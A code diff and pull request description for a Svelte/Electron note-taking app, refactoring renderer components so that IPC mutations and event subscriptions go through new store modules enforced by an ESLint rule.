     if (!domain) return;
     try {
-      await api.sites.add(domain, newSiteLabel.trim() || undefined);
+      await settings.addSite(domain, newSiteLabel.trim() || undefined);
       newSiteDomain = '';
       newSiteLabel = '';
       await reloadSites();
@@ -41,7 +44,7 @@
   async function loginSite(id: string): Promise<void> {
     siteBusyId = id;
     try {
-      await api.sites.login(id);
+      await settings.loginSite(id);
       await reloadSites();
     } finally {
       siteBusyId = null;
@@ -49,12 +52,12 @@
   }
 
   async function logoutSite(id: string): Promise<void> {
-    await api.sites.logout(id);
+    await settings.logoutSite(id);
     await reloadSites();
   }
 
   async function removeSite(id: string): Promise<void> {
-    await api.sites.remove(id);
+    await settings.removeSite(id);
     await reloadSites();
   }
 

--- a/src/renderer/lib/components/SkillsSettings.svelte
+++ b/src/renderer/lib/components/SkillsSettings.svelte
@@ -22,7 +22,10 @@
     type MenuConfig,
   } from '../../../shared/skills/menu-config';
   import { registerSkillInfos } from '../tools/tool-registry';
+  import { getSettingsStore } from '../stores/settings.svelte';
   import { MODEL_OPTIONS, modelLabel } from '../../../shared/tools/models';
+
+  const settings = getSettingsStore();
 
   interface Props {
     /** Per-skill model override map (skill id → model id). Owned + persisted
@@ -78,7 +81,7 @@
     skillCatalog = { ...skillCatalog, config: next };
     registerSkillInfos(applyMenuConfig(skillCatalog.skills, next));
     try {
-      const saved = await api.skills.setMenuConfig($state.snapshot(next));
+      const saved = await settings.setSkillsMenuConfig($state.snapshot(next));
       skillCatalog = { ...skillCatalog, config: saved };
       registerSkillInfos(applyMenuConfig(skillCatalog.skills, saved));
     } catch (e) {
@@ -132,7 +135,7 @@
     skillsError = null;
     skillsBusy = true;
     try {
-      const res = await api.skills.import();
+      const res = await settings.importSkill();
       if (res) await loadSkills();
     } catch (e) {
       skillsError = e instanceof Error ? e.message : String(e);
@@ -145,7 +148,7 @@
     skillsError = null;
     skillsBusy = true;
     try {
-      await api.skills.remove(id);
+      await settings.removeSkill(id);
       await loadSkills();
     } catch (e) {
       skillsError = e instanceof Error ? e.message : String(e);
@@ -158,7 +161,7 @@
     skillsError = null;
     skillsBusy = true;
     try {
-      const cat = await api.skills.reload();
+      const cat = await settings.reloadSkills();
       skillCatalog = cat;
       registerSkillInfos(applyMenuConfig(cat.skills, cat.config));
     } catch (e) {

--- a/src/renderer/lib/components/SourceDetail.svelte
+++ b/src/renderer/lib/components/SourceDetail.svelte
@@ -15,6 +15,11 @@
   import { displaySourceTitle } from '../../../shared/source-display';
   import { renameSource, deleteSource, addSourceTag, sourceTagSuggestions } from '../sources/source-actions';
   import { installDismissOnClickOutside } from '../dismiss-menu';
+  import { getSourceDataStore } from '../stores/source-data.svelte';
+  import { getNotebaseStore } from '../stores/notebase.svelte';
+
+  const sourceData = getSourceDataStore();
+  const notebase = getNotebaseStore();
 
   const READ_STATUS_OPTIONS: { value: ReadStatus; label: string }[] = [
     { value: 'unread', label: 'Unread' },
@@ -167,7 +172,7 @@
 
   async function handleRemoveTag(tag: string) {
     try {
-      await api.sources.removeTag(sourceId, tag);
+      await sourceData.removeTag(sourceId, tag);
       await load(sourceId);
     } catch (err) {
       console.error('[minerva] remove source tag failed:', err);
@@ -243,7 +248,7 @@
     saving = true;
     saveError = null;
     try {
-      await api.notebase.writeFile(bodyRelativePath, draftBody);
+      await notebase.writeFile(bodyRelativePath, draftBody);
       bodyContent = draftBody;
       editMode = false;
     } catch (err) {
@@ -280,7 +285,7 @@
     creatingExcerpt = true;
     excerptError = null;
     try {
-      const result = await api.sources.createExcerpt({ sourceId, citedText });
+      const result = await sourceData.createExcerpt({ sourceId, citedText });
       recentExcerpt = { id: result.excerptId, duplicate: result.duplicate };
       excerptMenu = null;
       // Reload the source detail so the new excerpt shows up in the list
@@ -298,7 +303,7 @@
   // Reload the source detail when the main process tells us an excerpt
   // was added/updated/removed (covers cross-window sync and any direct
   // filesystem edits the user made to excerpt ttls).
-  api.sources.onExcerptsChanged(() => {
+  sourceData.onExcerptsChanged(() => {
     if (loadedId === sourceId) void load(sourceId);
   });
 
@@ -352,7 +357,7 @@
   async function handleSetReadStatus(next: ReadStatus | null): Promise<void> {
     if (!detail) return;
     try {
-      await api.sources.setReadStatus(sourceId, next);
+      await sourceData.setReadStatus(sourceId, next);
       // Optimistic refresh — the SOURCES_CHANGED broadcast will also
       // fire but the local round trip is faster for the same-window
       // case.
@@ -369,7 +374,7 @@
     // value.
     const value = next && next.trim() ? next.trim() : null;
     try {
-      await api.sources.setReadDueBy(sourceId, value);
+      await sourceData.setReadDueBy(sourceId, value);
       await load(sourceId);
     } catch (err) {
       console.error('[minerva] setReadDueBy failed:', err);

--- a/src/renderer/lib/components/SourcesPanel.svelte
+++ b/src/renderer/lib/components/SourcesPanel.svelte
@@ -18,6 +18,9 @@
     flattenCollectionRows,
   } from '../sources/collection-tree';
   import Icon from './Icon.svelte';
+  import { getSourceDataStore } from '../stores/source-data.svelte';
+
+  const sourceData = getSourceDataStore();
 
   type QueueView = 'unread' | 'reading' | 'dueThisWeek' | 'recentlyFinished';
   const QUEUE_VIEWS: { id: QueueView; label: string }[] = [
@@ -165,7 +168,7 @@
   // The main process broadcasts COLLECTIONS_CHANGED after any mutation
   // (including from other windows / direct file edits). Keep our tree
   // in sync without forcing the host to call refresh() explicitly.
-  api.collections.onChanged(() => { void refreshCollections(); });
+  sourceData.onCollectionsChanged(() => { void refreshCollections(); });
 
   async function refreshCollections(): Promise<void> {
     const data = await api.collections.list();
@@ -242,7 +245,7 @@
     );
     if (!confirmed) return;
     try {
-      await api.sources.merge(src.sourceId, destId);
+      await sourceData.merge(src.sourceId, destId);
       onSourceDeleted?.(src.sourceId);
       await refresh();
     } catch (err) {
@@ -338,7 +341,7 @@
   async function handleMarkStatus(source: SourceMetadata, status: ReadStatus | null): Promise<void> {
     contextMenu = null;
     try {
-      await api.sources.setReadStatus(source.sourceId, status);
+      await sourceData.setReadStatus(source.sourceId, status);
       // Host listener refreshes the panel; nothing more to do.
     } catch (err) {
       console.error('[minerva] Mark status failed:', err);
@@ -351,7 +354,7 @@
   async function handleSetDueBy(source: SourceMetadata, dueBy: string | null): Promise<void> {
     const value = dueBy && dueBy.trim() ? dueBy.trim() : null;
     try {
-      await api.sources.setReadDueBy(source.sourceId, value);
+      await sourceData.setReadDueBy(source.sourceId, value);
       // Patch the in-memory record so the byline stamp updates even
       // if the host's refresh listener hasn't fired yet.
       source.readDueBy = value;
@@ -386,7 +389,7 @@
   async function handleStripUpstreamTags(source: SourceMetadata): Promise<void> {
     contextMenu = null;
     try {
-      await api.sources.stripUpstreamTags(source.sourceId);
+      await sourceData.stripUpstreamTags(source.sourceId);
     } catch (err) {
       console.error('[minerva] Strip upstream tags failed:', err);
     }
@@ -407,7 +410,7 @@
     if (!input) return;
     adding = true;
     try {
-      const result = await api.sources.ingestSmart(input);
+      const result = await sourceData.ingestSmart(input);
       await refresh();
       onSourceOpened?.(result.sourceId);
       if (result.duplicate) {
@@ -475,7 +478,7 @@
     const name = await onShowPrompt('New collection name:');
     if (!name) return;
     try {
-      await api.collections.create({ name, parent });
+      await sourceData.createCollection({ name, parent });
     } catch (err) {
       console.error('[minerva] Create collection failed:', err);
     }
@@ -486,7 +489,7 @@
     const name = await onShowPrompt('Rename collection:', c.name);
     if (!name || name === c.name) return;
     try {
-      await api.collections.rename(c.id, name);
+      await sourceData.renameCollection(c.id, name);
     } catch (err) {
       console.error('[minerva] Rename collection failed:', err);
     }
@@ -502,7 +505,7 @@
     if (!confirmed) return;
     if (activeCollectionId === c.id) activeCollectionId = null;
     try {
-      await api.collections.remove(c.id);
+      await sourceData.removeCollection(c.id);
     } catch (err) {
       console.error('[minerva] Delete collection failed:', err);
     }
@@ -523,7 +526,7 @@
     const name = await onShowPrompt('Rename smart collection:', smart.name);
     if (!name || name === smart.name) return;
     try {
-      await api.collections.renameSmart(smart.id, name);
+      await sourceData.renameSmartCollection(smart.id, name);
     } catch (err) {
       console.error('[minerva] Rename smart collection failed:', err);
     }
@@ -542,7 +545,7 @@
       smartMembers = null;
     }
     try {
-      await api.collections.removeSmart(smart.id);
+      await sourceData.removeSmartCollection(smart.id);
     } catch (err) {
       console.error('[minerva] Delete smart collection failed:', err);
     }
@@ -554,14 +557,14 @@
     if (!editor) return;
     try {
       if (editor.mode === 'create') {
-        const created = await api.collections.createSmart({ name, predicate });
+        const created = await sourceData.createSmartCollection({ name, predicate });
         // Auto-focus the new collection so the user sees what they
         // just made (mirrors the create-from-picker UX).
         await selectCollection(created.id);
       } else {
         const c = editor.collection;
-        if (name !== c.name) await api.collections.renameSmart(c.id, name);
-        await api.collections.updateSmartPredicate(c.id, predicate);
+        if (name !== c.name) await sourceData.renameSmartCollection(c.id, name);
+        await sourceData.updateSmartPredicate(c.id, predicate);
         // Re-fetch members if this is the active one.
         if (activeCollectionId === c.id) {
           smartMembers = new Set((await api.collections.smartMembers(c.id)).map((s) => s.sourceId));
@@ -582,7 +585,7 @@
     addToCollectionFor = null;
     if (!src) return;
     try {
-      await api.collections.addSource(collectionId, src.sourceId);
+      await sourceData.addSourceToCollection(collectionId, src.sourceId);
     } catch (err) {
       console.error('[minerva] Add to collection failed:', err);
     }
@@ -594,7 +597,7 @@
    *  it, and returns the new id so the picker can complete its
    *  selection flow. (#470) */
   async function handleCreateFromPicker(name: string): Promise<string> {
-    const created = await api.collections.create({ name, parent: null });
+    const created = await sourceData.createCollection({ name, parent: null });
     // The COLLECTIONS_CHANGED broadcast will fire too, but kicking
     // off a refresh here avoids the millisecond gap where the
     // picker might list the new collection without resolving its
@@ -608,7 +611,7 @@
     contextMenu = null;
     if (!activeCollectionId) return;
     try {
-      await api.collections.removeSource(activeCollectionId, source.sourceId);
+      await sourceData.removeSourceFromCollection(activeCollectionId, source.sourceId);
     } catch (err) {
       console.error('[minerva] Remove from collection failed:', err);
     }

--- a/src/renderer/lib/components/ToolPanel.svelte
+++ b/src/renderer/lib/components/ToolPanel.svelte
@@ -31,7 +31,7 @@
     running = true;
 
     try {
-      const result = await api.tools.execute({
+      const result = await panel.executeTool({
         toolId: tool.id,
         context: $state.snapshot(panel.context),
       });
@@ -89,7 +89,7 @@
   }
 
   async function handleCancel() {
-    await api.tools.cancel();
+    await panel.cancelTool();
     panel.fail('Cancelled');
     running = false;
   }

--- a/src/renderer/lib/components/conversations/MessageList.svelte
+++ b/src/renderer/lib/components/conversations/MessageList.svelte
@@ -4,6 +4,8 @@
   import DraftCards from './DraftCards.svelte';
   import { getConversationsStore, type TabRuntime } from '../../stores/conversations.svelte';
   import { getEditorStore } from '../../stores/editor.svelte';
+  import { getNotebaseStore } from '../../stores/notebase.svelte';
+  import { getSourceDataStore } from '../../stores/source-data.svelte';
   import { api } from '../../ipc/client';
   import { insertCitationMarker } from '../../conversations/cite-from-conversation';
   import { type CiteStatus } from '../../conversations/citations';
@@ -22,6 +24,8 @@
 
   const store = getConversationsStore();
   const editor = getEditorStore();
+  const notebase = getNotebaseStore();
+  const sourceData = getSourceDataStore();
 
   // Lightweight markdown-it for assistant message rendering. Mirrors the
   // configuration in the legacy ConversationDialog so prose renders the same way.
@@ -112,7 +116,7 @@
     try {
       // 1. Ingest the cited URL as a Source (no-op-ish if it already exists —
       //    the pipeline dedupes and returns the existing source id).
-      const { sourceId } = await api.sources.ingestUrl(cite.url);
+      const { sourceId } = await sourceData.ingestUrl(cite.url);
       // 2. Flush any pending editor edits to the target note first, so the
       //    disk read below sees them and our write doesn't get clobbered by a
       //    late autosave. Only the *active* tab can be dirty.
@@ -121,7 +125,7 @@
       //    re-indexes the graph, which is what materialises the cites edge.
       const text = await api.notebase.readFile(notePath);
       const next = insertCitationMarker(text, sourceId);
-      if (next !== text) await api.notebase.writeFile(notePath, next);
+      if (next !== text) await notebase.writeFile(notePath, next);
       // 4. Refresh the open tab (if any) so the user sees the new marker.
       await editor.reloadTabFromDisk(notePath);
       citeState = { ...citeState, [key]: { phase: 'done' } };

--- a/src/renderer/lib/components/right-sidebar/InspectionsPanel.svelte
+++ b/src/renderer/lib/components/right-sidebar/InspectionsPanel.svelte
@@ -1,7 +1,10 @@
 <script lang="ts">
   import { api } from '../../ipc/client';
+  import { getReviewStore } from '../../stores/review.svelte';
   import { onMount } from 'svelte';
   import Ribbon from './Ribbon.svelte';
+
+  const review = getReviewStore();
 
   interface Inspection {
     id: string;
@@ -33,7 +36,7 @@
 
   async function runNow() {
     loading = true;
-    inspections = await api.graph.runInspections();
+    inspections = await review.runInspections();
     loading = false;
   }
 

--- a/src/renderer/lib/components/right-sidebar/PropertiesPanel.svelte
+++ b/src/renderer/lib/components/right-sidebar/PropertiesPanel.svelte
@@ -18,6 +18,7 @@
   import YAML from 'yaml';
   import { onMount, tick } from 'svelte';
   import { api } from '../../ipc/client';
+  import { getNotebaseStore } from '../../stores/notebase.svelte';
   import AutocompleteDropdown from './AutocompleteDropdown.svelte';
   import Icon from '../Icon.svelte';
   import { resolveWikiLinkTarget } from '../../wiki-link-resolver';
@@ -65,6 +66,8 @@
   }
 
   let { content, onContentChange, onNavigate }: Props = $props();
+
+  const notebase = getNotebaseStore();
 
   type ValueShape =
     | { kind: 'string'; value: string }
@@ -421,13 +424,13 @@
   onMount(() => {
     void refreshProjectKeys();
     void refreshNoteBasenames();
-    const unsubscribeRewritten = api.notebase.onRewritten(() => {
+    const unsubscribeRewritten = notebase.onRewritten(() => {
       void refreshProjectKeys();
     });
-    const unsubscribeCreated = api.notebase.onFileCreated(() => {
+    const unsubscribeCreated = notebase.onFileCreated(() => {
       void refreshNoteBasenames();
     });
-    const unsubscribeDeleted = api.notebase.onFileDeleted(() => {
+    const unsubscribeDeleted = notebase.onFileDeleted(() => {
       void refreshNoteBasenames();
     });
     return () => {

--- a/src/renderer/lib/components/right-sidebar/ProposalsPanel.svelte
+++ b/src/renderer/lib/components/right-sidebar/ProposalsPanel.svelte
@@ -1,8 +1,11 @@
 <script lang="ts">
   import { api } from '../../ipc/client';
+  import { getReviewStore } from '../../stores/review.svelte';
   import { onMount } from 'svelte';
   import Ribbon from './Ribbon.svelte';
   import { describeProposer } from '../../../../shared/provenance';
+
+  const review = getReviewStore();
 
   type NotePayload = { kind: 'note'; relativePath: string; content: string };
   type TriplesPayload = { kind: 'graph-triples'; turtle: string; affectsNodeUris: string[] };
@@ -81,7 +84,7 @@
     // that lets the success banner say exactly what landed (and where).
     const snapshot = proposals.find((p) => p.uri === uri);
     try {
-      const ok = await api.proposals.approve(uri);
+      const ok = await review.approveProposal(uri);
       if (!ok) {
         lastError = 'Approve returned false — proposal may already be approved/rejected, or its payload has gone stale. Refresh to check.';
       } else {
@@ -117,7 +120,7 @@
     processing = true;
     lastError = null;
     try {
-      const ok = await api.proposals.reject(uri);
+      const ok = await review.rejectProposal(uri);
       if (!ok) {
         lastError = 'Reject returned false — proposal may already be resolved. Refresh to check.';
       } else {

--- a/src/renderer/lib/stores/notebase.svelte.ts
+++ b/src/renderer/lib/stores/notebase.svelte.ts
@@ -1,4 +1,4 @@
-import type { NoteFile, NotebaseMeta } from '../../../shared/types';
+import type { NoteFile, NotebaseMeta, ReplaceInNotesOptions } from '../../../shared/types';
 import { api } from '../ipc/client';
 
 let meta = $state<NotebaseMeta | null>(null);
@@ -42,6 +42,22 @@ export function getNotebaseStore() {
     }
   }
 
+  /**
+   * Write a note/source file to an arbitrary project-relative path (#1086).
+   * The single store-owned path for out-of-editor writes (source body edits,
+   * conversation-driven note rewrites) — components must not call
+   * `api.notebase.writeFile` directly. The active-editor buffer still saves
+   * through the editor store; this is for writes the editor doesn't own.
+   */
+  async function writeFile(relativePath: string, content: string): Promise<void> {
+    await api.notebase.writeFile(relativePath, content);
+  }
+
+  /** Project-wide find/replace across notes (#1086). Mutation → store-owned. */
+  function replaceInNotes(opts: ReplaceInNotesOptions) {
+    return api.notebase.replaceInNotes(opts);
+  }
+
   return {
     get meta() { return meta; },
     get files() { return files; },
@@ -50,5 +66,14 @@ export function getNotebaseStore() {
     newProject,
     close,
     refresh,
+    writeFile,
+    replaceInNotes,
+    // ── File-change subscriptions (main → renderer) ───────────────────────
+    // The store owns these `api.notebase.on*` subscriptions so components read
+    // the effects without touching `api` directly (renderer data-flow rule).
+    /** A note's content/frontmatter was rewritten (link rewrites, LLM applies). */
+    onRewritten: (cb: (paths: string[]) => void) => api.notebase.onRewritten(cb),
+    onFileCreated: (cb: (path: string) => void) => api.notebase.onFileCreated(cb),
+    onFileDeleted: (cb: (path: string) => void) => api.notebase.onFileDeleted(cb),
   };
 }

--- a/src/renderer/lib/stores/publish.svelte.ts
+++ b/src/renderer/lib/stores/publish.svelte.ts
@@ -1,0 +1,21 @@
+/**
+ * Publication / export write chokepoint (#1086).
+ *
+ * ExportDialog and PublishDialog read exporter/target/plan metadata directly
+ * (reads are allowed in components) but route the state-changing actions —
+ * running an export, pushing to a git remote, and adding/removing publish
+ * targets — through here, per the renderer data-flow rule (CLAUDE.md). Thin
+ * passthroughs; the dialogs keep their own view state.
+ */
+import { api } from '../ipc/client';
+
+export function getPublishStore() {
+  return {
+    runExport: (args: Parameters<typeof api.publish.runExport>[0]) =>
+      api.publish.runExport(args),
+    toGit: (targetId: string, opts?: { dryRun?: boolean }) => api.publish.toGit(targetId, opts),
+    upsertTarget: (target: Parameters<typeof api.publish.upsertTarget>[0]) =>
+      api.publish.upsertTarget(target),
+    removeTarget: (id: string) => api.publish.removeTarget(id),
+  };
+}

--- a/src/renderer/lib/stores/review.svelte.ts
+++ b/src/renderer/lib/stores/review.svelte.ts
@@ -1,0 +1,18 @@
+/**
+ * Review-sidebar action chokepoint (#1086).
+ *
+ * The right-sidebar review panels list their data with read calls (allowed in
+ * components) but route the actions that change state — approving/rejecting a
+ * proposal, and (re)running the graph health checks — through here, per the
+ * renderer data-flow rule (CLAUDE.md). Thin passthroughs.
+ */
+import { api } from '../ipc/client';
+
+export function getReviewStore() {
+  return {
+    approveProposal: (uri: string) => api.proposals.approve(uri),
+    rejectProposal: (uri: string) => api.proposals.reject(uri),
+    /** Re-run every graph health check and return the fresh inspection list. */
+    runInspections: () => api.graph.runInspections(),
+  };
+}

--- a/src/renderer/lib/stores/settings.svelte.ts
+++ b/src/renderer/lib/stores/settings.svelte.ts
@@ -1,0 +1,55 @@
+/**
+ * Settings-config write chokepoint (#1086).
+ *
+ * The self-contained settings dialogs (SettingsDialog, BibliographySettings,
+ * SitesSettings, SkillsSettings, ComputeSettings) read their config directly
+ * (reads are allowed in components) but route every *write* through here, so
+ * config mutations follow the renderer data-flow rule (CLAUDE.md) like any
+ * other state change. Native OS pickers (`csl.importStyle`'s file dialog,
+ * `compute.browsePython`, `skills.revealFolder`) that don't change app state
+ * on their own stay in the dialogs; here we only front the calls that persist
+ * config. Thin passthroughs — the dialogs still own their view state.
+ */
+import type { MenuConfig } from '../../../shared/skills/menu-config';
+import { api } from '../ipc/client';
+
+export function getSettingsStore() {
+  return {
+    // ── Clipper ───────────────────────────────────────────────────────────
+    setClipperEnabled: (enabled: boolean) => api.clipper.setEnabled(enabled),
+    regenerateClipperSecret: () => api.clipper.regenerateSecret(),
+
+    // ── Ingest / excerpt (per-machine + per-project) ──────────────────────
+    setIngestSettings: (settings: { importUpstreamTags: boolean }) =>
+      api.sources.setIngestSettings(settings),
+    setExcerptNoteFolder: (folder: string) => api.sources.setExcerptNoteFolder(folder),
+
+    // ── LLM / tools ───────────────────────────────────────────────────────
+    setToolSettings: (update: Parameters<typeof api.tools.setSettings>[0]) =>
+      api.tools.setSettings(update),
+
+    // ── Bibliography / CSL ────────────────────────────────────────────────
+    setBibliographyStyle: (styleId: string) => api.bibliography.setStyle(styleId),
+    importCslStyle: () => api.csl.importStyle(),
+    importCslLocale: () => api.csl.importLocale(),
+    removeCslStyle: (id: string) => api.csl.removeStyle(id),
+    removeCslLocale: (id: string) => api.csl.removeLocale(id),
+
+    // ── Privileged sites ──────────────────────────────────────────────────
+    addSite: (domain: string, label?: string) => api.sites.add(domain, label),
+    removeSite: (id: string) => api.sites.remove(id),
+    loginSite: (id: string) => api.sites.login(id),
+    logoutSite: (id: string) => api.sites.logout(id),
+
+    // ── Skills ────────────────────────────────────────────────────────────
+    importSkill: () => api.skills.import(),
+    reloadSkills: () => api.skills.reload(),
+    removeSkill: (id: string) => api.skills.remove(id),
+    setSkillsMenuConfig: (config: MenuConfig) => api.skills.setMenuConfig(config),
+
+    // ── Compute (Python) ──────────────────────────────────────────────────
+    setPythonSettings: (settings: { pythonPath: string }) =>
+      api.compute.setPythonSettings(settings),
+    restartPythonKernel: () => api.compute.restartPythonKernel(),
+  };
+}

--- a/src/renderer/lib/stores/source-data.svelte.ts
+++ b/src/renderer/lib/stores/source-data.svelte.ts
@@ -1,0 +1,60 @@
+/**
+ * Source + collection data mutations and change subscriptions (#1086).
+ *
+ * The single renderer chokepoint for writing source/collection state and for
+ * observing main→renderer source/collection/excerpt change broadcasts.
+ * Components (SourcesPanel, SourceDetail, PdfViewer, OcrProgressDialog,
+ * conversations/MessageList) call these instead of `api.sources.*` /
+ * `api.collections.*` directly, per the renderer data-flow rule (CLAUDE.md).
+ * Reads (`listAll`, `queueMembers`, `smartMembers`, `list`, `hasPdf`, …) stay
+ * in the components — only mutations and event subscriptions live here.
+ *
+ * These are thin passthroughs: they own the `api` call so the mutation surface
+ * is enforceable + mockable in tests; they don't cache the data (each panel
+ * still owns its own view state and refreshes on the change events below).
+ */
+import type { ReadStatus, SmartCollectionPredicate } from '../../../shared/types';
+import { api } from '../ipc/client';
+
+export function getSourceDataStore() {
+  return {
+    // ── Source mutations ──────────────────────────────────────────────────
+    setReadStatus: (sourceId: string, status: ReadStatus | null) =>
+      api.sources.setReadStatus(sourceId, status),
+    setReadDueBy: (sourceId: string, dueBy: string | null) =>
+      api.sources.setReadDueBy(sourceId, dueBy),
+    removeTag: (sourceId: string, tag: string) => api.sources.removeTag(sourceId, tag),
+    createExcerpt: (params: Parameters<typeof api.sources.createExcerpt>[0]) =>
+      api.sources.createExcerpt(params),
+    finishPdfOcr: (sourceId: string, pages: string[]) =>
+      api.sources.finishPdfOcr(sourceId, pages),
+    ingestSmart: (rawInput: string) => api.sources.ingestSmart(rawInput),
+    ingestUrl: (url: string) => api.sources.ingestUrl(url),
+    merge: (srcId: string, destId: string) => api.sources.merge(srcId, destId),
+    stripUpstreamTags: (sourceId: string) => api.sources.stripUpstreamTags(sourceId),
+
+    // ── Collection mutations ──────────────────────────────────────────────
+    createCollection: (args: { name: string; parent?: string | null }) =>
+      api.collections.create(args),
+    renameCollection: (id: string, name: string) => api.collections.rename(id, name),
+    removeCollection: (id: string) => api.collections.remove(id),
+    addSourceToCollection: (collectionId: string, sourceId: string) =>
+      api.collections.addSource(collectionId, sourceId),
+    removeSourceFromCollection: (collectionId: string, sourceId: string) =>
+      api.collections.removeSource(collectionId, sourceId),
+    createSmartCollection: (args: { name: string; predicate: SmartCollectionPredicate }) =>
+      api.collections.createSmart(args),
+    renameSmartCollection: (id: string, name: string) => api.collections.renameSmart(id, name),
+    removeSmartCollection: (id: string) => api.collections.removeSmart(id),
+    updateSmartPredicate: (id: string, predicate: SmartCollectionPredicate) =>
+      api.collections.updateSmartPredicate(id, predicate),
+
+    // ── Change subscriptions (main → renderer) ────────────────────────────
+    /** Fires when an excerpt is added / updated / removed. */
+    onExcerptsChanged: (cb: () => void) => api.sources.onExcerptsChanged(cb),
+    /** Fires when a source is added / updated / removed. */
+    onSourcesChanged: (cb: () => void) => api.sources.onChanged(cb),
+    /** Fires when a collection (manual or smart) changes. */
+    onCollectionsChanged: (cb: () => void) => api.collections.onChanged(cb),
+  };
+}

--- a/src/renderer/lib/stores/source-data.svelte.ts
+++ b/src/renderer/lib/stores/source-data.svelte.ts
@@ -26,8 +26,6 @@ export function getSourceDataStore() {
     removeTag: (sourceId: string, tag: string) => api.sources.removeTag(sourceId, tag),
     createExcerpt: (params: Parameters<typeof api.sources.createExcerpt>[0]) =>
       api.sources.createExcerpt(params),
-    finishPdfOcr: (sourceId: string, pages: string[]) =>
-      api.sources.finishPdfOcr(sourceId, pages),
     ingestSmart: (rawInput: string) => api.sources.ingestSmart(rawInput),
     ingestUrl: (url: string) => api.sources.ingestUrl(url),
     merge: (srcId: string, destId: string) => api.sources.merge(srcId, destId),

--- a/src/renderer/lib/stores/tool-panel.svelte.ts
+++ b/src/renderer/lib/stores/tool-panel.svelte.ts
@@ -1,4 +1,5 @@
-import type { ThinkingToolInfo, ToolContext, ToolExecutionResult } from '../../../shared/tools/types';
+import type { ThinkingToolInfo, ToolContext, ToolExecutionResult, ToolExecutionRequest } from '../../../shared/tools/types';
+import { api } from '../ipc/client';
 
 export type PanelState = 'hidden' | 'configure' | 'running' | 'review';
 
@@ -52,6 +53,15 @@ export function getToolPanelStore() {
     context = {};
   }
 
+  /** Run a tool (#1086). Mutation → store-owned so ToolPanel doesn't call `api`. */
+  function executeTool(request: ToolExecutionRequest) {
+    return api.tools.execute(request);
+  }
+  /** Cancel the in-flight tool run. */
+  function cancelTool() {
+    return api.tools.cancel();
+  }
+
   return {
     get activeTool() { return activeTool; },
     get panelState() { return panelState; },
@@ -65,5 +75,7 @@ export function getToolPanelStore() {
     complete,
     fail,
     close,
+    executeTool,
+    cancelTool,
   };
 }


### PR DESCRIPTION
Closes #1086.

## The rule

One rule for where `window.api` may be called, documented in **CLAUDE.md → Conventions → Renderer data flow**:

> Components may call `api.*` directly **only for reads and stateless OS side-effects**. Every **state mutation** and every **main→renderer event subscription** goes through a store (`src/renderer/lib/stores/*.svelte.ts`) or an App ops handler.

- **Reads** (queries returning data) — allowed in components.
- **Stateless OS side-effects** (`api.shell.*`, `api.export.csv`, `api.view.*`, native pickers, `skills.revealFolder`) — allowed (explicit exception; no observable app-state change).
- **Mutations + `api.*.on*` subscriptions** — must route through a store/ops.
- `App.svelte` (composition root) and `lib/app/*-ops` (the ops layer) are exempt.

## What changed

**Stores (the chokepoints)** — mutations/subscriptions are thin, mockable passthroughs:
- `notebase`: `writeFile`, `replaceInNotes`, `on{Rewritten,FileCreated,FileDeleted}`
- `source-data` (new): source + collection mutations + change subscriptions
- `settings` (new): settings-dialog config writes
- `publish` (new): export / git-publish actions
- `review` (new): proposal approve/reject + `runInspections`
- `tool-panel`: `executeTool`, `cancelTool`

**~17 components swept** — SourcesPanel, SourceDetail, PdfViewer, the five settings dialogs, ExportDialog, PublishDialog, FindInNotesDialog, conversations/MessageList, ProposalsPanel, InspectionsPanel, PropertiesPanel (file-event listeners), ToolPanel. Reads + shell/export/view calls stay in place.

The other ~18 components the audit flagged only ever call `api.*` for reads/side-effects, so they were already compliant. The IPC listeners the issue named (ConversationsPanel/Preview) already live in the conversations store / go through a callback prop — the stray listeners actually lived in PdfViewer/SourceDetail/SourcesPanel/PropertiesPanel and are now store-owned.

**Enforcement** — a component-scoped `no-restricted-syntax` rule in `eslint.config.mjs` (alongside the existing layer-boundary blocks) fails `pnpm lint` on a mutating/subscribing `api.*` call under `src/renderer/lib/components/**`. Verified it bites; zero violations remain.

## Verification

- [x] Rule documented (CLAUDE.md)
- [x] Mutation `api.*` calls moved out of components into stores; stray IPC listeners store-owned
- [x] ESLint rule enforces it (empty allowlist — no exemptions needed); confirmed it flags a planted violation with the data-flow message
- [x] `pnpm lint` clean; `pnpm test` green — **4402 tests / 467 files**
- [ ] **e2e not run locally** — `pnpm test:e2e` needs a full `electron-forge package` build + display, impractical in this environment; CI runs it. All conversions are behavior-preserving thin passthroughs (store method just calls the same `api` method), so runtime behavior is unchanged.

Note: `App.svelte`'s one `api.queries.save` stays (composition root); settings dialogs route writes through the new `settings` store (per the scoping decision — one consolidated store rather than six per-domain files).

🤖 Generated with [Claude Code](https://claude.com/claude-code)